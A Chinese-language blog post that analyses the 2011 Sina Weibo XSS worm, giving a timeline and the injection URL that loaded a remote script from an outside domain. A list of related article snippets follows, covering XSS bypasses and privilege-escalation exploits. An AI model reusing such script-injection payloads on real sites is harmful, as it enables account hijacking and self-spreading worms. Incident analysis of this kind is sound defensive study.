在开始实例的讲解之前,先看一下XSS的危害情况,第一张图中说明和XSS相关的CVE漏洞有7417个(http://web.nvd.nist.gov/view/vuln/search-results?query=xss&search_type=all&cves=on),第二张图说明在了乌云漏洞平台(www.wooyun.org)上和XSS相关的漏洞有2360个,足见XSS威力还是很大的。
这次举的例子是2011年6月28日新浪微博XSS攻击事件
事件的经过线索如下:
20:14,开始有大量带V的认证用户中招转发蠕虫
20:30,2kt.cn中的病毒页面无法访问
20:32,新浪微博中hellosamy用户无法访问
21:02,新浪漏洞修补完毕
新浪微博事件是利用了微博广场页面 http://weibo.com/pub/star 的一个URL注入了js脚本,其通过http://163.fm/PxZHoxn 短链接服务,将链接指向:http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update
其中的地址为:< script src="//www.2kt.cn/images/t.js"></script>,下面附一张来自腾讯科技的配图,
当时大多数分析者认为 Chrome 和 Safari 都没中招,IE、Firefox未能幸免。但IE8以后自动开启了XSS防御,所以普通用户使用IE8以上版本和Chrome以及Safari还是能防范普通XSS攻击的。
分享到:
相关推荐
基础知识 ...XSS 的原理分析与解剖:第四章(编码与绕过) XSS通关小游戏以及我的挑战思路分享 WEB 安全系列之如何挖掘 XSS 漏洞 XSS绕过之前端绕过 实战进阶 某学习直播平台的 xss 绕过 总结了下自己的 XS
第四章 权限提升 25 第 1 节 利用 Mssql+PcAnywhere 提权 25 第 2 节 端口复用工具突破各种远程登录疑难杂症 29 第 3 节 MS13-046 EXP 30 第 4 节 打破 MS13-046 不能 webshell 执行-1 31 第 5 节 打破 MS13-046 不...
第四节 跨站脚本攻击 什么是跨站脚本攻击 跨站脚本攻击的危害 如何防止跨站脚本攻击 XSS漏洞另一个攻击趋势 第五节 跨站请求伪造 什么是跨站请求伪造 跨站请求伪造的危害 如何防止跨站请求伪造 第六节 越权操作 ...
2 数据库字段支持下划线,MORESITE开启情况下Action类不生成在子目录3 网站域名更换导致提示"站点不存在"问题优化4 替换PHP过时的函数5 SQL注入加强,防XSS攻击6 文章标题和内容关联错乱问题BUG修复7 MC实例化8 自定义...
3.1.5 实例:针对导航过程发起攻击 49 3.2 建立安全连接 50 3.2.1 HTTPS 50 3.2.2 HTTPS请求中的Cookie 51 3.3 响应数据的安全检查——XSS过滤器 52 3.3.1 IE XSS Filter的实现原理 53 3.3.2 Chrome ...
第4周 上节内容回顾 心灵鸡汤 装饰器详解 装饰器应用详解 装饰器之函数即变量 装饰器之高阶函数 装饰器之嵌套函数 装饰器之案例剖析 装饰器之高潮讲解 迭代器与生成器 迭代器与生成器并行 内置方法详解 Json与...
本文实例讲述了jquery实现垂直无限轮播的方法。分享给大家供大家参考,具体如下: javascript垂直轮播,依赖于jquery实现的,并且首尾无缝衔接。... <li xss=removed>第四页 <li xss=removed>第一页</li>
整体而言,全书既有直观的实例,又有深入的分析,同时还涵盖了web应用开发中各方面的相关知识,堪称一部内容全面而又深入浅出的佳作。 图书目录 第1章 简介 1 1.1 Rails是敏捷的 2 1.2 读你所需 3 1.3 致谢 5 第1...
第4章 数据表示和分析 4.1 什么是协议 4.2 协议域 4.3 简单文本协议 4.4 二进制协议 4.5 网络协议 4.6 文件格式 4.7 常见的协议元素 4.7.1 名字-值对 4.7.2 块标识符 4.7.3 块长度 4.7.4 校验和 4.8 小结 第5章 有效...
TCCMS是一款具有良好的扩展性、安全、高效的内容...5 SQL注入加强,防XSS攻击 6 文章标题和内容关联错乱问题BUG修复 7 MC实例化 8 自定义模块字段建立某些类型不能输出BUG修复 9 后台模板编辑保存格式不允许是PHP格式
2)如果数据文件已经被分析家等软件占用导致无法打开时,将自动复制一份该文件,并从该备份文件中读取数据. 3)程序将自动补充数据,即如果目标表不存在,则建立并添加数据,如果目标表已存在,则判断表中每只证券的最新 ...
├─第4章 实验环境 │ 任务009:实验环境.mp4 │ ├─章 基本工具 │ 任务010:基本工具-NETCAT(telnet-banner、传输文本信息).mp4 │ 任务011:基本工具-NETCAT(传输-目录、流媒体服务、端口扫描、远程克隆硬盘...
注意: 标签开/闭合算2个节点 第几个子几点: document.getElementById(id).childNodes[n] 示例: 这里是 length-4 处,margin-left:20px 输出:length=8 实例: <div id=page_kx xss=removed class=tac> ...